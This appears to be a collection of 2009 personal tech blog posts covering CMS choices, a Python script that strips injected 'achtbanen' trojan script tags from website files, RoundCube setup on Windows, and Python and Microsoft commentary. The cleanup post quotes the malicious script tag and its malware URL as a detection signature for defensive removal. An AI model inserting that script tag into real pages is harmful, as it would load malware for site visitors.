Plone, Drupal or What?

A quick migration of a static website to a CMS version was needed. However one of the requirement is that it must be as ‘non-programmer’ as possible since an assigned web designer will be doing the project.

After toying around with Plone, its way too technical and the curve is just too much to even be considered. It is also pretty slow, around 1.3 times slower in a Pentium Celeron with 1GB memory compared to Drupal on a dummy blank site.

So Drupal was next in the list and in fact chosen for the job , however as 2 weeks gone by, it was obvious that what we know about Drupal is in fact largely OVERRATED. There are certain theme layouts that doesn’t appear correctly on different browsers, very limited customization without going to php and way too much work for a non-technical person to get it looking nice, not to mentioned that most sites on Drupal looks similar.

Finally we stumbled upon SiteFinity by SmarterTools, the condition however was that it had to run on IIS but in this case we had no issues with that since the project doesn’t mind whether its IIS or Apache (who the hell going to modify apache code in the name of open source?)

SiteFinity not only blows Drupal to stoneage, more importantly we saved the Web designer guy from committing suicide. For once she was able to get something done.

** there is a community version available free for use

Removing “achtbanen” trojan links

Ok so someone got careless and somehow his website files have been replaced with links to a trojan. Each of the html/asp files have been injected with a script “<script src=http://achtbanen.org/images/blah blah blah></script>”

I was asked to write a script to clean it up, so here it is, a script injector remover, basically will work on any injected one liner script (modify the signature on “FindThis” in the source yourself), by default will remove this particular achtbanen line.

TrjLinkRemove.py

# Copyright 2009, codemagnet.blogspot.com

# Free to use ;-), just keep this credit comments.

import sys

import os

import nowlog

logfile = nowlog.SetLogConfig("removed.log")

"""<script src=http://achtbanen.org/images/b-one-default.php ></script>"""

FindThis = "<script src=http://achtbanen.org/images"

FindThisJS = "document.write('<script src=http://"

MaximumIndexTail = 150 #  search 150 off the first found signature

def dirwalk(dir):

    "walk a directory tree, using a generator"

    try :

        for f in os.listdir(dir):

            fullpath = os.path.join(dir,f)

            if os.path.isdir(fullpath) and not os.path.islink(fullpath):

                for x in dirwalk(fullpath):  # recurse into subdir

                    yield x

            else:

                yield fullpath            

    except :

        pass

def CleanFile (filename) :

    global FindThis

    try :

        f = open(filename, "rb")

        fb = f.read()

        f.close()

        i = fb.find(FindThis) 

        if i == -1 :

            return

        # found

        o = fb.find("</script>", i+len(FindThis), i+len(FindThis) + MaximumIndexTail)

        if o == -1:

            logfile.error("partial found, ignored, %s", filename)

            return

        # create a new file

        newfile = filename + ".trj.rmv"

        p = open(filename + ".trj.rmv", "wb")

        p.write(fb[:i])

        p.write(fb[o+9:])

        p.close()

        os.rename(filename, filename + ".xxxx")

        os.rename(newfile, filename)

        os.unlink(filename + ".xxxx")

        logfile.info("Cleaning : %s", filename)        

    except :

        logfile.error("unable to open file %s", filename)

        return

#-------------------------------------------------------------------------#

def CleanFileJS (filename) :

    global FindThis

    try :

        f = open(filename, "rb")

        fb = f.read()

        f.close()

        i = fb.find(FindThisJS) 

        if i == -1 :

            return

        # found

        o = fb.find(".php", i+len(FindThisJS), i+len(FindThisJS) + MaximumIndexTail)

        if o == -1:

            logfile.error("partial found, ignored, %s", filename)

            return

        # create a new file

        newfile = filename + ".trj.rmv"

        p = open(filename + ".trj.rmv", "wb")

        p.write(fb[:i])

        p.close()

        os.rename(filename, filename + ".xxxx")

        os.rename(newfile, filename)

        os.unlink(filename + ".xxxx")

        logfile.info("Cleaning : %s", filename)        

    except :

        logfile.error("unable to open file %s", filename)

        return

def cleanup (path) :

    for x in dirwalk(path) :

        o = x.split(".")

        if o[-1].lower() in ["asp","html","htm", "aspx"] :

            CleanFile(x)          

            continue

        if o[-1].lower() == "js" :

            CleanFileJS(x)        

if __name__ == "__main__" :

    if len(sys.argv) < 2 :

        print "Removes achtbanen trojan links from all webfiles"

        print "TrjLinkRemove <path>"

        print "e.g TrjLinkRemove c:\\iisroot"

        sys.exit(1)

    if not os.path.exists(sys.argv[1]) :

        print "invalid path given"

        sys.exit(1)

    cleanup(sys.argv[1])    

nowlog.py

import logging, logging.handlers

def SetLogConfig (namefile):

    logfile = logging.handlers.TimedRotatingFileHandler(namefile , 'midnight', 1, backupCount=14)

    logfile.setLevel(logging.INFO)    

    FORMAT = "%(asctime)-15s %(levelname)s:[%(thread)d]:%(message)s"           

    logfile.setFormatter(logging.Formatter(FORMAT))    

    ch = logging.StreamHandler()

    ch.setLevel(logging.INFO)

    Logger = logging.getLogger(namefile)

    Logger.addHandler(logfile)

    Logger.addHandler(ch)

    Logger.setLevel(logging.INFO)    

    return Logger

* sorry about the formatting –.- was using a code snippet plugin

World First Email Server with MSN Robot (Avatar)

This is probably true as the team gets ready to launch MailNow!5

MailNow! 5 is a Windows Mail Server that is of the likes of SmarterMail, Mdaemon, Merak and Hmail. The difference would be the amount of innovation that the team built into the MailNow! 5 that would eliminate log searching, greps etc for mail tracing , anti domain queue hogging and features on accountability that is way off the conventional school.

One distinct one is the world first Email Server Robot or Avatar. Its is an MSN robot that would inform users of the mail server status, new mails alert + details, collect log files, send SMS alerts, compose emails, retrieve emails, provide Email server spam statistics, emails per hour statistics and provide an “eliza” chat for idle users.

Looks really cool when it was demoed today. I guess the folks attending the launch on 12 Nov, 2009  will get some sneak peek too. (www.internetnow.com.my)

If you see any other mail servers adding this feature in the future, you heard it here first. That Malaysian made, MailNow! 5 , the windows mail server…had the first ever robot.

The team won’t be patenting it, the team here is just too engrossed in technical development than to invest in any legal procedures to write such a patent. Chances is MS Exchange would build one super robot in the future and who’s gonna sue?

RoundCube on Windows

While testing the high speed IMAP server that i developed, i wanted to see how it perform with some open source webmail, particularly those that works with IMAP.

One of the most popular one that i found is RoundCube.

1. First you need to install the WAMPSERVER. The php included should be version 5++

2. Open up php.ini and make sure “extension_dir” points to the right directory which is under …\php\ext. Put in the extension module for sql . e.g

extension_dir = "/usr/local/apache/php/ext"
extension=php_mysql.dll

Yeah i created an c:/usr even on my Windows so that i don’t have to much changes.

3. Open up httpd.conf and make sure u have :-

<IfModule dir_module>

DirectoryIndex index.html index.php

</IfModule>

Double check to see if the following is loaded :

LoadModule php5_module "/usr/local/apache/php/php5apache2_2.dll"

4. Install Mysql for Windows. (This can open up one whole can of worms if you get it wrong)

5. Open the INSTALL file found in RoundCube and follow the instruction to create the database for roundcube. I would advice you to stick to the names given.

5. Open the roundcube\conf\, rename the *.dist to *. (whithout dist extension). E.g  db.inc.php.dist –> db.inc.php

Edit db.inc.php and set the  : 

config['db_dsnw'] = 'mysql://roundcube:pass@localhost/roundcubemail'

to the username password that is created in 5, if you followed the default it should be :

config['db_dsnw'] = 'mysql://roundcube:password@localhost/roundcubemail'

Edit the main.inc.php and set the this to where ur email server is :

$rcmail_config['smtp_server'] = '10.8.0.21';

 

6. Now copy this whole roundcube folder to a subfolder under htdocs (apache) . For e.g c:\usr\local\apachce\htdocs\roundcube

And you can try and access it via : http://x.x.x.x./roundcube

Good luck.

Preaching Python : The obstacles

I am a big fan of Python. I am a Windows Developer. I’ve been doing C/C++ as long as i can remember before jumping to C# to leverage on the .NET.

I abandoned Java when it was 2 years old, it just never got me attracted. Maybe its because my field centralizes on system level and security and not enterprise business applications. 

Python has a distinct place in development today. But try convincing the following crowd :-

1. A Windows C#/ASP.NET developer, been using VB since 1997.

2. Java Developer with over 7 years of exp

3. C++ /C hardcore

4. PHP developer

Here are the list of the most common obstacles :

1. Python is SLOW

2. Python has no strong Enterprise Framework

3. Python has weak data typing, its hard to create APIs for users to extend.

4. C# can do everything that Python can and it works better in Windows and..faster.

5. Python GUI development in Windows sucks.

6. see no.1

Python is slow. Compared to  C. Which language is faster than C ? Assembly maybe but definitely not Java or C#.  Does the program speed really matter so much when practically in most applications the speed differences might not even exist to be practical.

Lets say you are developing a Network application that accepts data from the Internet and do something with it. The internet bandwidth speed from your ISP to you is nothing compared to your LAN speed. Lately The CPU processing power has grown from exponential to straight upward beating Moore’s Law.  In this case python would do perfectly well, the bottleneck is not the application speed but rather the internet speed.

One of the exceptions would be if you are doing scientific research and mathematical data of which nanoseconds per iteration differences might matter to you.

Python is slow? Use C then for the part that requires special computational algorithm . Recently a friend of mine showed me a game called Civilization, its the latest version and it uses Python. It runs fast and flawlessly on my Vista. I believe they used python just for the main framework of the game coding while the graphic rendering is back to C/C++ . Now that is smart.

Python is slow? Blink. Did u see the difference?

Windows Live, Twisted

This is the first posting via the Windows Live Writer. Today my MSN Messenger pops up and literally forced me to upgrade my Msgr to the Windows Live version.

What surprises me was the list of other services that you get to choose to install apart from Messenger itself  and one of them is this Windows Live Writer.  It allows you to post to various blogs (the first  one in the menu is MS own service naturally…)

The online office documents is the other apps. This  put the power of the MS Office to the internet for laymen. It makes google docs looks like cavemen offering. The google doc is laden with incompatible glitches when uploading MS documents over, and MS answers to this is a solid one.  Try uploading a powerpoint and you will get what i mean….not a big issue , minor displacement here and there but still…

So what has this gotta do with Twisted ? Nothing really, except that the solid feel you get when using components from MS compared to Twisted (open source component) sometimes is evident, at least to developers that are not just MS bashers. On the other hand, MS is super slow in adopting and promoting what is evidently internet driven standards and if you want to develop for Windows, chances is  that MS already have some offering that is either free, “included in the OS/will be” or some bundling Server products. The development for Windows software is a grim future to many Windows developers (except for project based solutions) . Of course the gang of MS partners and those getting projects from MS as partners via MS solutions are making tons.

For independent product development, Windows leaves Anti-virus, some security related fields and libraries/components the only profitable playing field for Windows Developers looking at “off the shelf” development. 

Now back to twisted, i was  looking at imap4.py, the “search_” functions have a typo bug that will never work , a simple one…missing an “s” on 3 functions of which i have reported to twistedmatrix. If MS components have such bugs, it would be totally unacceptable and laughable.  I was thinking to myself, is this a framework that has so much hoo-haa in Python and over 7 years of evolution? Don’t even want to start on its poor documentation. If its not because of its beautiful skeletal architecture for various protocols, i would say asynch chat in the standard Python library would be more productive.  (noob ! noob!, yeah spare me the insults)

Python is the best  thing i have found in the OSS world. Each day passed by and i still find it the most attractive programming language.  I place Python on the same playing fields as C++, Java, C#, not Perl and other scripting languages. Its meant for serious development and deserved to be used in an IDE and adopted by full fledged teams.

Are you using C#? Try python, use the Wing-ide. You won’t regret! You won’t lose much of the VS pampering that you are so used to and you get to think …somewhat…differently.

Google And Microsoft : Twin Effect

The evidence can be found everywhere. Headlines, headways and in some people's head.
The pattern is recognizable given that one have been around since DOS days.
Google, the company that was once just associated with "search" is no longer staying where its domain is. It has tentacles that reaches far and wide but with one clear difference. The community don't realize it or maybe they do but they sure don't hate it.

Perhaps MS's reputation and brand was so powerfully seared into the hearts and minds of computing folks that we could only identify MS as the only possible gigantic sofware company that we could hate. One that squashes its competitor mercilessly using various "partnership" tactics through the history of IT. Novell...Nescape....scandisk....C++ builder...Word Perfect...Quattro Pro....OS/2......Isn't scandisk just a program, yeah, so was Netscape browser. Sure some of these companies survived but became obscure tech names, a fraction of what they could have been.

Times are changing indeed. Windows Mobile is losing out. Microsoft Live Search is a joke. A victim of its own game in an ever changing world. Its rare to hear MS losing in an area that it plans to focus or profit from but the new kid in town is nothing like MS have seen. Previously everyone had to fight MS in MS own turf...and since that turf is the OS itself, it was rarely a fair fight. Its 90% of the World's desktops dear, get real. But what if you challenge MS in a very unlikely place...the cloud?

When MS IE7 could not open the Google Wave page and Chrome could use it perfectly (ok firefox and other browsers worked somewhat) , you get a very familiar feeling. This creepy Dejavu feeling just jumps out of the page into your lap.

Android phones? Google Doc? GMail for Corporates? GAE hosted domain.

China always had a long history of bad Emperors and those who attempt to topple them. Given such power and position, it was usual for Emperors to behave like morons and do what they want regardless of the citizens sentiments. Heck an Emperor gets to have 600++ wives!

But Chinese History also teaches us one thing, topple one Emperor, the one taking over his place is no better.